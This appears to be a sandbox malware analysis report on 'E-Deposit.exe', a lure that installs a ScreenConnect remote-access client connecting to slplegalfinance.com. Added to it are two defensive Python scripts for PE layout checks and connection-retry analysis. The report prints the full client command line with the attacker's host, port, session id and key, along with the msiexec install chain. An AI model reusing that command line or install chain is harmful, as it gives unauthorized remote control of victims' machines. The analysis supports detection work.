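The section, data-directory and resource tables above are enough to sanity-check the file's physical layout without the sample in hand. The script below is an added example, not part of the Joe Sandbox report and not ScreenConnect code. It takes those values as constants, derives each section's file offset on the assumption that the headers occupy the usual 0x400 bytes (the report does not print PointerToRawData), and checks three things a reviewer of a signed installer cares about: that the Authenticode certificate table begins exactly where the last section's raw data ends and runs exactly to the reported file size (so no unsigned overlay hides before or after it), that the six resources are back-to-back with no slack between them, and at which file offset each embedded .NET image starts so it can be carved. It also decodes the link timestamp the report shows. One caveat for the practitioner: the certificate table here is 0x17b70 bytes, roughly 97 KB, well beyond what a certificate chain plus countersignature needs, and bytes inside that table are not covered by the Authenticode hash. A passing layout check says the blob is where the signature says it is, not that it is benign; extract and inspect it separately.

```python
"""PE layout consistency checks driven by the values in the report above.

Added example, not part of the Joe Sandbox report or of ScreenConnect.  The
section, data-directory and resource values are copied from the report; the
one assumption is the usual 0x400-byte header block before the first section's
raw data, since the report does not show PointerToRawData.
"""
from datetime import datetime, timezone

FILE_SIZE = 5_627_248        # "File size" from the report
HEADER_RAW_SIZE = 0x400      # assumption: SizeOfHeaders for a 5-section 32-bit image

# (name, VirtualAddress, VirtualSize, SizeOfRawData) from the section table
SECTIONS = [
    (".text",  0x1000,   0xb1af,   0xb200),
    (".rdata", 0xd000,   0x6078,   0x6200),
    (".data",  0x14000,  0x11e4,   0x800),
    (".rsrc",  0x16000,  0x533074, 0x533200),
    (".reloc", 0x54a000, 0xea8,    0x1000),
]
# IMAGE_DIRECTORY_ENTRY_SECURITY: (file offset, size); a raw offset, not an RVA
SECURITY_DIR = (0x546200, 0x17b70)
# (name, RVA, size) from the resource table: five embedded .NET images and a manifest
RESOURCES = [
    ("FILES",       0x163d4,  0x86000),
    ("FILES",       0x9c3d4,  0x1a4600),
    ("FILES",       0x2409d4, 0x1ac00),
    ("FILES",       0x25b5d4, 0x2ec318),
    ("FILES",       0x5478ec, 0x1600),
    ("RT_MANIFEST", 0x548eec, 0x188),
]


def raw_layout(sections=SECTIONS, header_size=HEADER_RAW_SIZE):
    """Derive PointerToRawData per section by stacking raw sizes in table order.

    Returns {name: (raw_offset, raw_size)}.  Correct when sections sit in the
    file in the same order as in memory, which is how linkers emit them.
    """
    layout, offset = {}, header_size
    for name, _va, _vsize, raw_size in sections:
        layout[name] = (offset, raw_size)
        offset += raw_size
    return layout


def rva_to_offset(rva, sections=SECTIONS, header_size=HEADER_RAW_SIZE):
    """Map an RVA to a file offset; None if unmapped or if it lies only in the
    zero-filled tail where VirtualSize exceeds SizeOfRawData."""
    layout = raw_layout(sections, header_size)
    for name, va, vsize, raw_size in sections:
        if va <= rva < va + max(vsize, raw_size):
            delta = rva - va
            return layout[name][0] + delta if delta < raw_size else None
    return None


def certificate_table_is_trailing(sections=SECTIONS, security=SECURITY_DIR,
                                  file_size=FILE_SIZE):
    """True when the certificate table starts exactly where the last section's
    raw data ends and runs exactly to EOF: no unsigned overlay before or after it."""
    last_end = max(off + size for off, size in raw_layout(sections).values())
    sec_off, sec_size = security
    return last_end == sec_off and sec_off + sec_size == file_size


def resource_offsets(resources=RESOURCES):
    """(name, file offset, size) for each resource: where to carve the blobs."""
    return [(name, rva_to_offset(rva), size) for name, rva, size in resources]


def resource_gaps(resources=RESOURCES):
    """Bytes between consecutive resources; non-zero means slack worth a look."""
    return [nxt[1] - (cur[1] + cur[2]) for cur, nxt in zip(resources, resources[1:])]


def build_timestamp_utc(stamp=0x6377E6AC):
    """Decode the PE TimeDateStamp the way the report shows it."""
    return datetime.fromtimestamp(stamp, tz=timezone.utc)


if __name__ == "__main__":
    for name, (off, size) in raw_layout().items():
        print(f"{name:7s} raw 0x{off:06x}..0x{off + size:06x}")
    print("certificate table trailing:", certificate_table_is_trailing(),
          "size:", SECURITY_DIR[1], "bytes")
    for name, off, size in resource_offsets():
        print(f"{name:12s} file offset 0x{off:06x} size 0x{size:x}")
    print("gaps between resources:", resource_gaps())
    print("link time:", build_timestamp_utc().isoformat())
```

With the report's numbers the derived layout closes exactly: .reloc's raw data ends at 0x546200, the certificate table starts there and ends at byte 5'627'248, and the manifest resource ends exactly at the end of .rsrc's virtual size, so nothing in this image is unaccounted for except the contents of the certificate table itself.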
DLL | Import
mscoree.dll | CorBindToRuntimeEx
KERNEL32.dll | GetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
OLEAUT32.dll | VariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
Language of compilation system | Country where language is spoken | Map
English | United States |
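The packet table that follows lists individual segments; what matters for detection is the pattern across them. The script below is an added example, not part of the Joe Sandbox report: it embeds the table's rows as constructed input, rebuilds them into flows keyed by the client's ephemeral port (a new port is a new connection attempt) and measures the spacing between successive attempts. The only assumption is that 192.168.2.4 is the analysis VM, as the table itself shows. For the rows in this section it finds seven short connections to 185.143.228.176:443, six segments each (three in each direction; the last one is still open when the listing ends), started 2.6, 3.5, 5.0, 6.9, 10.8 and 13.3 seconds apart: a client retrying with a growing wait. That cadence, rather than any single session, is what to look for in flow logs.

```python
"""Rebuild TCP flows from the report's packet table and measure the retry cadence.

Added example, not part of the Joe Sandbox report.  PACKETS is a copy of the
report's rows (timestamp, source port, dest port, source IP, dest IP); the only
assumption is that 192.168.2.4 is the analysis VM, as the table shows.
"""
import re
from datetime import datetime
from decimal import Decimal

LOCAL_IP = "192.168.2.4"
EPOCH = datetime(1970, 1, 1)
ROW = re.compile(r"^(\w{3} \d+, \d{4} \d\d:\d\d:\d\d\.\d+) \w+ (\d+) (\d+) (\S+) (\S+)$")

PACKETS = """\
Jan 6, 2025 11:46:17.220957994 CET 49731 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:17.221004963 CET 443 49731 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:17.221077919 CET 49731 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:17.759484053 CET 49731 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:17.759510040 CET 443 49731 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:17.759576082 CET 443 49731 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:19.817991972 CET 49732 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:19.818032026 CET 443 49732 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:19.818095922 CET 49732 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:19.820024014 CET 49732 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:19.820039988 CET 443 49732 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:19.820204973 CET 443 49732 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:23.316339970 CET 49733 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:23.316395998 CET 443 49733 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:23.316478014 CET 49733 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:23.319569111 CET 49733 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:23.319592953 CET 443 49733 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:23.319624901 CET 443 49733 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:28.280692101 CET 49737 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:28.280723095 CET 443 49737 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:28.280828953 CET 49737 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:28.283675909 CET 49737 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:28.283693075 CET 443 49737 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:28.283755064 CET 443 49737 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:35.150012016 CET 49741 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:35.150113106 CET 443 49741 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:35.150213957 CET 49741 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:35.152678013 CET 49741 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:35.152713060 CET 443 49741 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:35.152751923 CET 443 49741 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:45.916002035 CET 49742 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:45.916048050 CET 443 49742 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:45.916134119 CET 49742 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:45.918446064 CET 49742 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:45.918462038 CET 443 49742 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:45.918505907 CET 443 49742 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:59.180828094 CET 49743 443 192.168.2.4 185.143.228.176
Jan 6, 2025 11:46:59.180883884 CET 443 49743 185.143.228.176 192.168.2.4
Jan 6, 2025 11:46:59.180955887 CET 49743 443 192.168.2.4 185.143.228.176
"""


def parse_ts(text):
    """'Jan 6, 2025 11:46:17.220957994' -> Decimal seconds; keeps all nine
    fraction digits, which strptime's %f (six digits) would reject."""
    base, frac = text.rsplit(".", 1)
    whole = int((datetime.strptime(base, "%b %d, %Y %H:%M:%S") - EPOCH).total_seconds())
    return Decimal(whole) + Decimal("0." + frac)


def flows(packets=PACKETS, local_ip=LOCAL_IP):
    """Group packets into flows keyed by (local port, remote IP, remote port).
    Returns dicts ordered by first packet: key, start, end, packets, outbound, inbound."""
    table = {}
    for line in packets.strip().splitlines():
        m = ROW.match(line)
        if not m:
            raise ValueError(f"unparsed row: {line!r}")
        ts = parse_ts(m.group(1))
        sport, dport, src, dst = int(m.group(2)), int(m.group(3)), m.group(4), m.group(5)
        outbound = src == local_ip
        key = (sport, dst, dport) if outbound else (dport, src, sport)
        f = table.setdefault(key, {"key": key, "start": ts, "end": ts,
                                   "packets": 0, "outbound": 0, "inbound": 0})
        f["end"] = max(f["end"], ts)
        f["packets"] += 1
        f["outbound" if outbound else "inbound"] += 1
    return sorted(table.values(), key=lambda f: f["start"])


def reconnect_intervals(flow_list=None):
    """Seconds between the starts of successive connections, rounded to 0.1 s."""
    fl = flows() if flow_list is None else flow_list
    return [round(float(b["start"] - a["start"]), 1) for a, b in zip(fl, fl[1:])]


def is_backing_off(intervals):
    """True when each retry waits longer than the one before it."""
    return len(intervals) > 1 and all(b > a for a, b in zip(intervals, intervals[1:]))


if __name__ == "__main__":
    fl = flows()
    for f in fl:
        port, ip, rport = f["key"]
        print(f"{port} -> {ip}:{rport}  {f['packets']} pkts "
              f"({f['outbound']} out / {f['inbound']} in), {float(f['end'] - f['start']):.3f} s")
    gaps = reconnect_intervals(fl)
    print("retry spacing:", gaps, "backing off:", is_backing_off(gaps))
```

Timestamps are kept as Decimal because the report prints nine fractional digits and the first connection's lifetime (about 0.54 s, against a few milliseconds for the later ones) is the kind of detail that float rounding of an epoch value would blur.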
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 6, 2025 11:46:17.220957994 CET | 49731 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:17.221004963 CET | 443 | 49731 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:17.221077919 CET | 49731 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:17.759484053 CET | 49731 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:17.759510040 CET | 443 | 49731 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:17.759576082 CET | 443 | 49731 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:19.817991972 CET | 49732 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:19.818032026 CET | 443 | 49732 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:19.818095922 CET | 49732 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:19.820024014 CET | 49732 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:19.820039988 CET | 443 | 49732 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:19.820204973 CET | 443 | 49732 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:23.316339970 CET | 49733 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:23.316395998 CET | 443 | 49733 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:23.316478014 CET | 49733 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:23.319569111 CET | 49733 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:23.319592953 CET | 443 | 49733 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:23.319624901 CET | 443 | 49733 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:28.280692101 CET | 49737 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:28.280723095 CET | 443 | 49737 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:28.280828953 CET | 49737 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:28.283675909 CET | 49737 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:28.283693075 CET | 443 | 49737 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:28.283755064 CET | 443 | 49737 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:35.150012016 CET | 49741 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:35.150113106 CET | 443 | 49741 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:35.150213957 CET | 49741 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:35.152678013 CET | 49741 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:35.152713060 CET | 443 | 49741 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:35.152751923 CET | 443 | 49741 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:45.916002035 CET | 49742 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:45.916048050 CET | 443 | 49742 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:45.916134119 CET | 49742 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:45.918446064 CET | 49742 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:45.918462038 CET | 443 | 49742 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:45.918505907 CET | 443 | 49742 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:59.180828094 CET | 49743 | 443 | 192.168.2.4 | 185.143.228.176
Jan 6, 2025 11:46:59.180883884 CET | 443 | 49743 | 185.143.228.176 | 192.168.2.4
Jan 6, 2025 11:46:59.180955887 CET | 49743 | 443 | 192.168.2.4 | 185.143.228.176
                                                                                  Jan 6, 2025 11:46:59.182981014 CET49743443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:46:59.182998896 CET44349743185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:46:59.183033943 CET44349743185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:47:15.290977955 CET49781443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:47:15.291007042 CET44349781185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:47:15.291098118 CET49781443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:47:15.293442011 CET49781443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:47:15.293452978 CET44349781185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:47:15.293495893 CET44349781185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:47:37.483553886 CET49924443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:47:37.483596087 CET44349924185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:47:37.483666897 CET49924443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:47:37.485764027 CET49924443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:47:37.485780001 CET44349924185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:47:37.485838890 CET44349924185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:48:13.477514029 CET50012443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:48:13.477552891 CET44350012185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:48:13.477628946 CET50012443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:48:13.479921103 CET50012443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:48:13.479933023 CET44350012185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:48:13.479989052 CET44350012185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:48:57.122226000 CET50013443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:48:57.122265100 CET44350013185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:48:57.122335911 CET50013443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:48:57.124819040 CET50013443192.168.2.4185.143.228.176
                                                                                  Jan 6, 2025 11:48:57.124835968 CET44350013185.143.228.176192.168.2.4
                                                                                  Jan 6, 2025 11:48:57.124887943 CET44350013185.143.228.176192.168.2.4
                                                                                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                  Jan 6, 2025 11:46:17.014406919 CET | 58713 | 53 | 192.168.2.4 | 1.1.1.1
                                                                                  Jan 6, 2025 11:46:17.172060013 CET | 53 | 58713 | 1.1.1.1 | 192.168.2.4

                                                                                  Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                                                  Jan 6, 2025 11:46:17.014406919 CET | 192.168.2.4 | 1.1.1.1 | 0xb65c | Standard query (0) | slplegalfinance.com | A (IP address) | IN (0x0001) | false

                                                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                  Jan 6, 2025 11:46:17.172060013 CET | 1.1.1.1 | 192.168.2.4 | 0xb65c | No error (0) | slplegalfinance.com |  | 185.143.228.176 | A (IP address) | IN (0x0001) | false

                                                                                  Target ID:0
                                                                                  Start time:05:46:10
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Users\user\Desktop\E-Deposit.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\E-Deposit.exe"
                                                                                  Imagebase:0xad0000
                                                                                  File size:5'627'248 bytes
                                                                                  MD5 hash:70D47FA2E078F04400D3D1B236245678
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1699705428.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1712436337.0000000007AA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1666529785.0000000000AE6000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1678535852.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:1
                                                                                  Start time:05:46:11
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\484f9eed1d8e13b9\ScreenConnect.ClientSetup.msi"
                                                                                  Imagebase:0xae0000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:2
                                                                                  Start time:05:46:11
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Windows\System32\msiexec.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                  Imagebase:0x7ff67e4b0000
                                                                                  File size:69'632 bytes
                                                                                  MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:3
                                                                                  Start time:05:46:11
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 7C96E0C746C692A03058DACF458A9432 C
                                                                                  Imagebase:0xae0000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:05:46:11
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSICCC5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5885281 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                  Imagebase:0x2e0000
                                                                                  File size:61'440 bytes
                                                                                  MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:5
                                                                                  Start time:05:46:13
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6DF4961B2A2833D6816518D4EE959F34
                                                                                  Imagebase:0xae0000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:6
                                                                                  Start time:05:46:14
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding BF7ECCB9F681B80AAF512F5A86264840 E Global\MSI0000
                                                                                  Imagebase:0xae0000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:high
                                                                                  Has exited:true

                                                                                  Target ID:7
                                                                                  Start time:05:46:14
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=slplegalfinance.com&p=443&s=01fec5eb-3274-44cf-8963-40ccf08671d2&k=BgIAAACkAABSU0ExAAgAAAEAAQDVyeZoBLn8WdM6xWDr4b0uAsUBfhP2EJOSdZugmbrUWVWehsUh2LvfCfwDYGcJBhcBEWS%2fDmahaCPw1tkv%2f%2bw18TIjThn%2bQ%2feZavwugcHDfdkaqKi0LnYdddcCsozuL7%2bVQevv9snFAHOiSjLD7xdNlPMSw%2bw682fIJIkr8XbdhPPukmg4Ksp6Kf1Xba7KkmNnwSS1MRXckDb%2f1hQrUI%2fSZZdGbJvZ3tc%2f3CR0LXLnGeCLG7Dt5iRIHwzJf5XuTInHiPesoO6bSk%2bUfoeCYO3BjvU6pRL6UKY08mjZ7e%2b6FOQb4acTm6QTR9K%2fsvFdvWQ%2br7EyKwXpSy6iTh4x7%2f%2bv"
                                                                                  Imagebase:0xf50000
                                                                                  File size:95'512 bytes
                                                                                  MD5 hash:75B21D04C69128A7230A0998086B61AA
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Antivirus matches:
                                                                                  • Detection: 0%, ReversingLabs
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                  Target ID:8
                                                                                  Start time:05:46:16
                                                                                  Start date:06/01/2025
                                                                                  Path:C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe" "RunRole" "c767b2ee-2b09-4628-9d93-0df3c46d63ac" "User"
                                                                                  Imagebase:0x6f0000
                                                                                  File size:602'392 bytes
                                                                                  MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000002.3520090259.0000000002A01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1729054331.00000000006F2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (484f9eed1d8e13b9)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                  Antivirus matches:
                                                                                  • Detection: 0%, ReversingLabs
                                                                                  Reputation:moderate
                                                                                  Has exited:false

                                                                                    • Instruction Fuzzy Hash: DA21B3B13402024BD715BA7ED890A5FBAEBEBD93503508939D026CF354EE749C018BE2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1677192141.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1780000_E-Deposit.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (xq
                                                                                    • API String ID: 0-3100309293
                                                                                    • Opcode ID: d70fe854c4d60d31c086af88d03744aa7f9d996d446489937252da468510dd50
                                                                                    • Instruction ID: 237e1b65dc49ced9bf2cfcaee5a4aaf5f545a00146417b60be3067090b1e1fb0
                                                                                    • Opcode Fuzzy Hash: d70fe854c4d60d31c086af88d03744aa7f9d996d446489937252da468510dd50
                                                                                    • Instruction Fuzzy Hash: E511B6757045058FCB24EB6DD484B2AB7E6FFCC254B158519E449C7341DF35EC028B91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1677192141.0000000001780000.00000040.00000800.00020000.00000000.sdmp, Offset: 01780000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_1780000_E-Deposit.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (xq
                                                                                    • API String ID: 0-3100309293
                                                                                    • Opcode ID: 04fb6dc2f101bce78b3314df1f15fc9dfa486d568603441ae7e13289dcaee886
                                                                                    • Instruction ID: c6a6336b2ebb964d0e811558968b8204729709cd1d5a4c007e9437df61a373f5
                                                                                    • Opcode Fuzzy Hash: 04fb6dc2f101bce78b3314df1f15fc9dfa486d568603441ae7e13289dcaee886
